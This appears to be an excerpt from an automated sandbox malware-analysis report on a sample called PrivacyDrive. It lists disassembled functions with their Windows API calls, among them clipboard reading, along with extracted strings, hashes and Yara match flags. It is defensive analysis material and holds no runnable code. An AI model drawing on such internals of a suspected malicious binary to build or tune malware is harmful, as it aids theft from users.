GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 05A6F637

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: c8c3f322294afc792f9a3891880f22d457848c62115798dccafcea3f68673e4a
Instruction ID: 26c2fea2cfdb6648680f58d912f202ab7274a71c51e82809627682f89b5afccd
Opcode Fuzzy Hash: c8c3f322294afc792f9a3891880f22d457848c62115798dccafcea3f68673e4a
Instruction Fuzzy Hash: 9FE09234340700EFEB209B20DC97F157679AB45B01F244058FA01AF3D0E671B801CA19

Function 05A6F06E Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 05A6F637

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 3dd86c06e9cb23d453a267a5856bac3833f2cc4cc61aaf9998024a49e532f7e1
Instruction ID: 0b11152eac4b440ac3c141637edd6f95919738bf1fed6e3f84fc292b3182e9c5
Opcode Fuzzy Hash: 3dd86c06e9cb23d453a267a5856bac3833f2cc4cc61aaf9998024a49e532f7e1
Instruction Fuzzy Hash: 8DE05E74390700BFF7305B10AC53F2A397A9B01F05F204019B7017E1E0EAB17410591D

Function 05A76730 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(05A79F2B,?,00000006,?,?,00000018,?,?,?), ref: 05A7675E

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 05A42631 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 05A42643

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: db882d2a1de6a6e5c446127ff528ae2919a8900fbff7d0659333149ed4010492
Instruction ID: c9011a05021e98db6336be04019e2d6453304ae92fcb54626a1a11cedcb9838c
Opcode Fuzzy Hash: db882d2a1de6a6e5c446127ff528ae2919a8900fbff7d0659333149ed4010492
Instruction Fuzzy Hash: BED048303E8304B6F1300A28AC1BF083914A302F22F700780B3207C0C08DE031028A1D

Function 05A6F113 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,?,?,00000000,00000000), ref: 05A6F123

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 5542f07ea21a5569c760b37d1f468b61362cf758dc133f4f017bd31f58927485
Instruction ID: 5d38aa4c3678be6503aff83cfc4e7419fd4160d1902037ebf05afba5507a0606
Opcode Fuzzy Hash: 5542f07ea21a5569c760b37d1f468b61362cf758dc133f4f017bd31f58927485
Instruction Fuzzy Hash: E1C04C343D0305B6F5314A14FC1BF183A15B706F02F600051F3417C0D08EE162229519

Function 05A73142 Relevance: 1.5, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 05A73148

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 406017e479ee4e06e8476c9e3322b82c3a7052434123d82f51304ae65ade4a35
Instruction ID: 0852c85342f7dde8a3a44e6f66aa4fb75966327ce030cb8abd4e926c0867d5d3
Opcode Fuzzy Hash: 406017e479ee4e06e8476c9e3322b82c3a7052434123d82f51304ae65ade4a35
Instruction Fuzzy Hash: 75B01230080010EBC5101B04BC0AF873F359F40250F010050F004480B1C51149A6C5E5

Function 05A42610 Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 05A42621

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 033ca1e0b4403762ae222cd757bd3d4aa3942e018e84d63354ba1c3693568ac7
Instruction ID: 6e52dd751b168af6c102713589310e86319e41f32a992f4a476db416ed874f64
Opcode Fuzzy Hash: 033ca1e0b4403762ae222cd757bd3d4aa3942e018e84d63354ba1c3693568ac7
Instruction Fuzzy Hash: FFC08C2106420CA7E220273DAC0BF1A3D2CA343762F400320FAA0400C17EA0241AC5BA

Non-executed Functions

Function 01030B95 Relevance: 26.1, Strings: 20, Instructions: 1129COMMON

Download Yara Rule

Strings

`cb,, xrefs: 01031411
lonq, xrefs: 01031432
ho, xrefs: 01031A95
KJML, xrefs: 01030D89, 01030D95
twvy, xrefs: 01031448
!"#m, xrefs: 01031427
<=2, xrefs: 0103161D
}e, xrefs: 01030BE1
tuJK, xrefs: 01031583
()./, xrefs: 010315E6
89&', xrefs: 01031557
89>?, xrefs: 01031612
9:;<, xrefs: 0103143D
ti, xrefs: 01030BF4
1{z}, xrefs: 01031453
{9, xrefs: 01030BD9
<=:;, xrefs: 0103154C
J1, xrefs: 01030BE9
-./ , xrefs: 0103141C
`Y^_, xrefs: 010315BA

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: !"#m$()./$-./ $1{z}$89&'$89>?$9:;<$<=2$<=:;$J1$KJML$`Y^_$`cb,$ho$lonq$tuJK$twvy$ti${9$}e
API String ID: 0-3143562861
Opcode ID: 413d8ea3ea457b2b80a31d0a047ffe2c7e0a09391632f3cf7a89d01ebf83dfcb
Instruction ID: 6b35821f14b6f4c384ee8d0a4e71ac6368b2be68fd8e5b30141375ec3ecb60e5
Opcode Fuzzy Hash: 413d8ea3ea457b2b80a31d0a047ffe2c7e0a09391632f3cf7a89d01ebf83dfcb
Instruction Fuzzy Hash: 35A288B06083819FE774CF14C880BAFBBE5AFD9351F14482DEAC99B291DB359844CB56

Function 05A4F193 Relevance: 26.1, Strings: 20, Instructions: 1129COMMON

Download Yara Rule

Strings

`cb,, xrefs: 05A4FA0F
1{z}, xrefs: 05A4FA51
()./, xrefs: 05A4FBE4
J1, xrefs: 05A4F1E7
KJML, xrefs: 05A4F387, 05A4F393
}e, xrefs: 05A4F1DF
lonq, xrefs: 05A4FA30
<=2, xrefs: 05A4FC1B
`Y^_, xrefs: 05A4FBB8
!"#m, xrefs: 05A4FA25
9:;<, xrefs: 05A4FA3B
89&', xrefs: 05A4FB55
tuJK, xrefs: 05A4FB81
<=:;, xrefs: 05A4FB4A
{9, xrefs: 05A4F1D7
twvy, xrefs: 05A4FA46
ho, xrefs: 05A50093
-./ , xrefs: 05A4FA1A
89>?, xrefs: 05A4FC10
ti, xrefs: 05A4F1F2

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: !"#m$()./$-./ $1{z}$89&'$89>?$9:;<$<=2$<=:;$J1$KJML$`Y^_$`cb,$ho$lonq$tuJK$twvy$ti${9$}e
API String ID: 0-3143562861
Opcode ID: 004ba8a427025f0268202182fe83c9dde54dd1d0b090d4d48186d6021ac9c749
Instruction ID: ddcb6db3625946938d3326bfe0bf2451840d9cdd44a54d46e6bb68ae25c8ebcd
Opcode Fuzzy Hash: 004ba8a427025f0268202182fe83c9dde54dd1d0b090d4d48186d6021ac9c749
Instruction Fuzzy Hash: 80A243B16083819FE730CF54C884FABBBE1BB85754F14481DEA899B291DB359844CFA7

Function 05A682A0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 05A682BD
GetWindowLongW.USER32 ref: 05A682F0
GetClipboardData.USER32 ref: 05A68300
GlobalLock.KERNEL32 ref: 05A68319
GlobalUnlock.KERNEL32 ref: 05A68401
CloseClipboard.USER32 ref: 05A68407

Strings

1, xrefs: 05A68372

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: 1
API String ID: 2832541153-2212294583
Opcode ID: c65eecdf94ff0dba2ea8afcc768d17197b0c8a28d8b068c92e0e22877eb3e972
Instruction ID: c04231c1f8cadd5253203f756d540e24ece98be5aea14b5274518b00ef119e9a
Opcode Fuzzy Hash: c65eecdf94ff0dba2ea8afcc768d17197b0c8a28d8b068c92e0e22877eb3e972
Instruction Fuzzy Hash: 8E41B37090878ACFCB10EFBC9949BAE7FF5AB06220F040668E4E1A72C1D7384545C767

Function 010211B2 Relevance: 9.1, Strings: 7, Instructions: 390COMMON

Download Yara Rule

Strings

=:li, xrefs: 01021507
MSO, xrefs: 01021314
2$1., xrefs: 01021545, 0102154D
6(>*, xrefs: 0102150F
Ga!1, xrefs: 010214FF
IK, xrefs: 0102130C
ZABC, xrefs: 0102131C

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: 2$1.$6(>*$=:li$Ga!1$ZABC$IK$MSO
API String ID: 0-2205979412
Opcode ID: 6f5fb733ebc5f304785a0cad369c011f03ff98ce4417e72d8a49ee95e203c399
Instruction ID: 61bf25f81403daba53ff18532be8fa6a1c23c174cc56d8d90f41ffd4509c0034
Opcode Fuzzy Hash: 6f5fb733ebc5f304785a0cad369c011f03ff98ce4417e72d8a49ee95e203c399
Instruction Fuzzy Hash: 00D1AAB050C3A08BD321DF18C494A6EBFE1BFAA644F580D9CE5D59B352C336C949CB96

Function 0103F577 Relevance: 9.0, Strings: 7, Instructions: 249COMMON

Download Yara Rule

Strings

L!Z', xrefs: 0103F8E3
45, xrefs: 0103F90B
T1L7, xrefs: 0103F903
\)K/, xrefs: 0103F8D3
M-_#, xrefs: 0103F8DB
Y9B?, xrefs: 0103F8F3
W%];, xrefs: 0103F8EB

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: 45$L!Z'$M-_#$T1L7$W%];$Y9B?$\)K/
API String ID: 0-4037157281
Opcode ID: 000fa583c27e3bd1cf902c9d6b0d847f7fca54b88e81b478b20c270248eaddc6
Instruction ID: e9694ee87e7a0e874722938881bd9affb077f561bd3155b59faadd2c8e89d109
Opcode Fuzzy Hash: 000fa583c27e3bd1cf902c9d6b0d847f7fca54b88e81b478b20c270248eaddc6
Instruction Fuzzy Hash: E9A113B4508381AFE310DF54E880A1EBBF4AB96B84F540A1DF6D4AB260D375D905CF67

Function 05A5DB75 Relevance: 9.0, Strings: 7, Instructions: 249COMMON

Download Yara Rule

Strings

W%];, xrefs: 05A5DEE9
L!Z', xrefs: 05A5DEE1
T1L7, xrefs: 05A5DF01
\)K/, xrefs: 05A5DED1
45, xrefs: 05A5DF09
M-_#, xrefs: 05A5DED9
Y9B?, xrefs: 05A5DEF1

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: 45$L!Z'$M-_#$T1L7$W%];$Y9B?$\)K/
API String ID: 0-4037157281
Opcode ID: b9553c36bfe18ae17c4899dde819485bc04f5349e398244ec5e07d39e86007ee
Instruction ID: 162f33e60ca2b323eb8d67600cc1c9468bc4aee0c06011ec82cb067b521be182
Opcode Fuzzy Hash: b9553c36bfe18ae17c4899dde819485bc04f5349e398244ec5e07d39e86007ee
Instruction Fuzzy Hash: 41A122B4608381AFE310DF55E880A1EBBF4AB96784F500A1DF5D4AB250D371DA05CF67

Function 01012CB5 Relevance: 8.5, Strings: 6, Instructions: 960COMMON

Download Yara Rule

Strings

0, xrefs: 01013949
i, xrefs: 010144C7
@, xrefs: 0101414B
0, xrefs: 010138F0
0, xrefs: 010138C3
0, xrefs: 01013FA9

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: 0$0$0$0$@$i
API String ID: 0-1499800099
Opcode ID: bfdcd44171e054af30594285362d8ec87d0cf3f40a53c01fd1d8bb4925963302
Instruction ID: 8ab76389e9dbd30d6e80f0fc72e062d2314911497c8229bbb496848aaa1a3b39
Opcode Fuzzy Hash: bfdcd44171e054af30594285362d8ec87d0cf3f40a53c01fd1d8bb4925963302
Instruction Fuzzy Hash: 3F72C1716083418FD309CF28C59075EBBE1BBC9714F14896DE9D9CB3A9D738D9098B82

Function 05A312B3 Relevance: 8.5, Strings: 6, Instructions: 960COMMON

Download Yara Rule

Strings

i, xrefs: 05A32AC5
0, xrefs: 05A325A7
0, xrefs: 05A31EEE
0, xrefs: 05A31EC1
@, xrefs: 05A32749
0, xrefs: 05A31F47

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: 0$0$0$0$@$i
API String ID: 0-1499800099
Opcode ID: 94727299a176c4892e99b4de9314a3d9dafe0fe468226e97a54144552ebace90
Instruction ID: d13860decd29980f82057b2fb8f39d09779de4a5844d6ecdfebe899517099c04
Opcode Fuzzy Hash: 94727299a176c4892e99b4de9314a3d9dafe0fe468226e97a54144552ebace90
Instruction Fuzzy Hash: E472AE75A0C3419FD318CF28C591B6ABBE2AFC8748F14892DF4A997391D734D909CB92

Function 05A31418 Relevance: 7.9, Strings: 6, Instructions: 444COMMON

Download Yara Rule

Strings

0123456789ABCDEFXP, xrefs: 05A31418
0123456789abcdefxp, xrefs: 05A31422
-, xrefs: 05A320BC
gfff, xrefs: 05A32111
gfff, xrefs: 05A321C6
gfff, xrefs: 05A32178

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
API String ID: 0-854689426
Opcode ID: 88b003883cca5f7a0acb5dad5d3291c8043254e20e05857638589303b6c81ac6
Instruction ID: 66d3f216c2137a001928779281833ff7471be129ff2b23425780b1fc7fd5cbbf
Opcode Fuzzy Hash: 88b003883cca5f7a0acb5dad5d3291c8043254e20e05857638589303b6c81ac6
Instruction Fuzzy Hash: BFF18E75A087518FD718CF28C491B6ABBE2BFC9314F088A2DF9958B391D334D945CB92

Function 05A31359 Relevance: 7.8, Strings: 6, Instructions: 345COMMON

Download Yara Rule

Strings

gfff, xrefs: 05A32320
0123456789ABCDEFXP, xrefs: 05A31359
0123456789abcdefxp, xrefs: 05A31363
-, xrefs: 05A322D6
gfff, xrefs: 05A32371
gfff, xrefs: 05A3230B

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
API String ID: 0-854689426
Opcode ID: 8fd56d4d1c4299e2cf8d98fe44a8463d5ae86aac825f3e2e6a4be07db2ecd43f
Instruction ID: a9db44315a3d2147e2dbbcf2857922f45b5e305932d9975fd75f78d143bd9fa4
Opcode Fuzzy Hash: 8fd56d4d1c4299e2cf8d98fe44a8463d5ae86aac825f3e2e6a4be07db2ecd43f
Instruction Fuzzy Hash: 89D1A17560D3518FC714CF29C581B6ABBE2AFC9308F088A6DF8D987352D234D945CB92

Function 01012E1A Relevance: 5.4, Strings: 4, Instructions: 444COMMON

Download Yara Rule

Strings

gfff, xrefs: 01013B7A
-, xrefs: 01013ABE
gfff, xrefs: 01013BC8
gfff, xrefs: 01013B13

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: -$gfff$gfff$gfff
API String ID: 0-3742897846
Opcode ID: afa2c59b7174b298cbdebdc209c61c00909c0ffdb9e6b4652cf0d3c2488a223f
Instruction ID: 6273f385a03079d3079501f61aaed65359a829d4ff2ca9c540df33385bd74276
Opcode Fuzzy Hash: afa2c59b7174b298cbdebdc209c61c00909c0ffdb9e6b4652cf0d3c2488a223f
Instruction Fuzzy Hash: B3F19D71A083918FD358CE2CC49075ABBE2BBC9314F488A2DF9D9CB395D738D9458B42

Function 01012D5B Relevance: 5.3, Strings: 4, Instructions: 345COMMON

Download Yara Rule

Strings

gfff, xrefs: 01013D22
gfff, xrefs: 01013D0D
-, xrefs: 01013CD8
gfff, xrefs: 01013D73

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: -$gfff$gfff$gfff
API String ID: 0-3742897846
Opcode ID: 8d5eba57cc02c7181bcdba891e0a0af26107097a06c2f890a8e2723ddbbedac9
Instruction ID: 789e5d442bc0c650bfc58b14dbe0afcbeb29c048c627749eb6a1db1169fbdd04
Opcode Fuzzy Hash: 8d5eba57cc02c7181bcdba891e0a0af26107097a06c2f890a8e2723ddbbedac9
Instruction Fuzzy Hash: E3D1A0706093918FC314CE2DC59065ABBE1AFC9314F088A6DF9D9CB356D738D905CB92

Function 01012FB3 Relevance: 5.3, Strings: 4, Instructions: 343COMMON

Download Yara Rule

Strings

+, xrefs: 01013AB7
gfff, xrefs: 01013B7A
gfff, xrefs: 01013BC8
gfff, xrefs: 01013B13

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: +$gfff$gfff$gfff
API String ID: 0-2357821266
Opcode ID: 57560c12fcb4a5efa8ba590f06c0909563ef7215965b45d5facb10313411421f
Instruction ID: 6657b0bd357d80039bb8d46b9998cf8c4d85bf8e338c2a38391b6c1d14c416dc
Opcode Fuzzy Hash: 57560c12fcb4a5efa8ba590f06c0909563ef7215965b45d5facb10313411421f
Instruction Fuzzy Hash: ACC1A071A083418FD758CE2DC49075EBBE2BBC9314F488A2DE9D9CB395D738D9058B42

Function 05A315B1 Relevance: 5.3, Strings: 4, Instructions: 343COMMON

Download Yara Rule

Strings

gfff, xrefs: 05A32111
gfff, xrefs: 05A321C6
+, xrefs: 05A320B5
gfff, xrefs: 05A32178

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: +$gfff$gfff$gfff
API String ID: 0-2357821266
Opcode ID: 07c04f61262b677080fdd49bc83f86cb1f0ffd0b735f059575d1afc3f3f9e063
Instruction ID: af54e9a47375533abe6cd3f4ce172d91d3c54dd19eec1abaf700b498566f8d55
Opcode Fuzzy Hash: 07c04f61262b677080fdd49bc83f86cb1f0ffd0b735f059575d1afc3f3f9e063
Instruction Fuzzy Hash: 38C1BF75A087418FC718CF29C491B6BBBE2BFC9314F088A2DF9958B391D634D905CB92

Function 01013A08 Relevance: 5.3, Strings: 4, Instructions: 280COMMON

Download Yara Rule

Strings

+, xrefs: 01013AB7
gfff, xrefs: 01013B7A
gfff, xrefs: 01013BC8
gfff, xrefs: 01013B13

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: +$gfff$gfff$gfff
API String ID: 0-2357821266
Opcode ID: 29f89fd07181678e07d233ffca9ef692ea22027e14ad50a671a1cb7e9ada4a94
Instruction ID: c683f4d9b9d98a1564d875674d01edbe4ff297c36130b825b10b1cbed16022d5
Opcode Fuzzy Hash: 29f89fd07181678e07d233ffca9ef692ea22027e14ad50a671a1cb7e9ada4a94
Instruction Fuzzy Hash: 5CA1BE71A087518FC718CE1CC99025EBBE2BBC9314F488A6DF9D9CB356D738D9448782

Function 05A32006 Relevance: 5.3, Strings: 4, Instructions: 280COMMON

Download Yara Rule

Strings

gfff, xrefs: 05A32111
gfff, xrefs: 05A321C6
+, xrefs: 05A320B5
gfff, xrefs: 05A32178

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: +$gfff$gfff$gfff
API String ID: 0-2357821266
Opcode ID: 29f89fd07181678e07d233ffca9ef692ea22027e14ad50a671a1cb7e9ada4a94
Instruction ID: e2e0e2c2a112e48f35b45e110e3c9055a7b9380a18aecb18b1b12b8578f56322
Opcode Fuzzy Hash: 29f89fd07181678e07d233ffca9ef692ea22027e14ad50a671a1cb7e9ada4a94
Instruction Fuzzy Hash: 94A1BF75A097518FC708CE1CC991B6ABBE2AFC8304F088A2DF995CB352D634DD45CB92

Function 0101F4B2 Relevance: 5.2, Strings: 4, Instructions: 200COMMON

Download Yara Rule

Strings

_kQT, xrefs: 0101F5A9
@DvF, xrefs: 0101F5C1
1")&, xrefs: 0101F579
a[[d, xrefs: 0101F5A1

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: 1")&$@DvF$_kQT$a[[d
API String ID: 0-276304770
Opcode ID: 120e7987c176392a5503b588ab93b9273890ba6732227fe43507c8885721f780
Instruction ID: 5091ba203983f16f3504ea92b4b276107edf9e1a3b3079a9fc97a1d80031f14a
Opcode Fuzzy Hash: 120e7987c176392a5503b588ab93b9273890ba6732227fe43507c8885721f780
Instruction Fuzzy Hash: B45106B410C3929FD312CF298490A5ABFE1AB97644F184D8DE5E54B256C33AC909CB67

Function 05A3DAB0 Relevance: 5.2, Strings: 4, Instructions: 200COMMON

Download Yara Rule

Strings

_kQT, xrefs: 05A3DBA7
@DvF, xrefs: 05A3DBBF
1")&, xrefs: 05A3DB77
a[[d, xrefs: 05A3DB9F

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: 1")&$@DvF$_kQT$a[[d
API String ID: 0-276304770
Opcode ID: 120e7987c176392a5503b588ab93b9273890ba6732227fe43507c8885721f780
Instruction ID: c37f5090b33be6f5083e0263daa193007bb1a6b6cd9a78909289589f51a38cd2
Opcode Fuzzy Hash: 120e7987c176392a5503b588ab93b9273890ba6732227fe43507c8885721f780
Instruction Fuzzy Hash: 5D5137B410C3819FD302CF299491A2BBFE2AB97649F184D4CF4E54B352C37689099B67

Function 01022911 Relevance: 5.2, Strings: 4, Instructions: 191COMMON

Download Yara Rule

Strings

{7@1, xrefs: 01022BB5
@3R, xrefs: 01022BBC
6{6u, xrefs: 01022C1E
,c'}, xrefs: 01022C10

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: ,c'}$6{6u$@3R${7@1
API String ID: 0-581628498
Opcode ID: d0a7b642b8c017893b6f45fbb6b48bc174d9839a4a6b9c085318be5e2dd8e902
Instruction ID: 747d70a5a11b9519f9957178568d941f7e5e1b8f3ab2a06ec8dbc832bc917639
Opcode Fuzzy Hash: d0a7b642b8c017893b6f45fbb6b48bc174d9839a4a6b9c085318be5e2dd8e902
Instruction Fuzzy Hash: CAB1CCB4411B848FD3718F66C585B9BBFB0BB12704F508A0DE1EA6BA50D375A046CF9A

Function 05A40F0F Relevance: 5.2, Strings: 4, Instructions: 191COMMON

Download Yara Rule

Strings

@3R, xrefs: 05A411BA
,c'}, xrefs: 05A4120E
{7@1, xrefs: 05A411B3
6{6u, xrefs: 05A4121C

Memory Dump Source

Source File: 00000013.00000002.2002868683.0000000005A31000.00000020.10000000.00040000.00000000.sdmp, Offset: 05A31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5a31000_PrivacyDrive.jbxd

Similarity

API ID:
String ID: ,c'}$6{6u$@3R${7@1
API String ID: 0-581628498
Opcode ID: ffc2fc946b5b3ca3e86c9b9d5932bd881b1197980ba8623ce28b5880dbfcd8e3
Instruction ID: 64c7eeb0b904ba16bc2246d2c67be5c9f1733391ad2dc54a1012af3ab094ca1d
Opcode Fuzzy Hash: ffc2fc946b5b3ca3e86c9b9d5932bd881b1197980ba8623ce28b5880dbfcd8e3
Instruction Fuzzy Hash: DEB1BCB4415B848FD3708F66C585B9BBFB0BB11604F508E0DE1EA6BB50D375A046CF9A

Function 01035D92 Relevance: 5.2, Strings: 4, Instructions: 164COMMON

Download Yara Rule

Strings

OO, xrefs: 01035DEC
4J, xrefs: 01035DF3
J+*), xrefs: 01035F41
VG, xrefs: 01035DE5

Memory Dump Source

Source File: 00000013.00000002.2000589436.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Offset: 01010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1010000_PrivacyDrive.jbxd

Yara matches

Similarity

API ID:
String ID: 4J$J+*)$OO$VG
API String ID: 0-160897490
Opcode ID: 0f994e25e501778185bac6c0785b33e44ab021523602a15f7da29192aebbcbaf
Instruction ID: 392d72713e21335b872517cab725ba4385958d5775975c4ece7c6bae7be51cd6
Opcode Fuzzy Hash: 0f994e25e501778185bac6c0785b33e44ab021523602a15f7da29192aebbcbaf
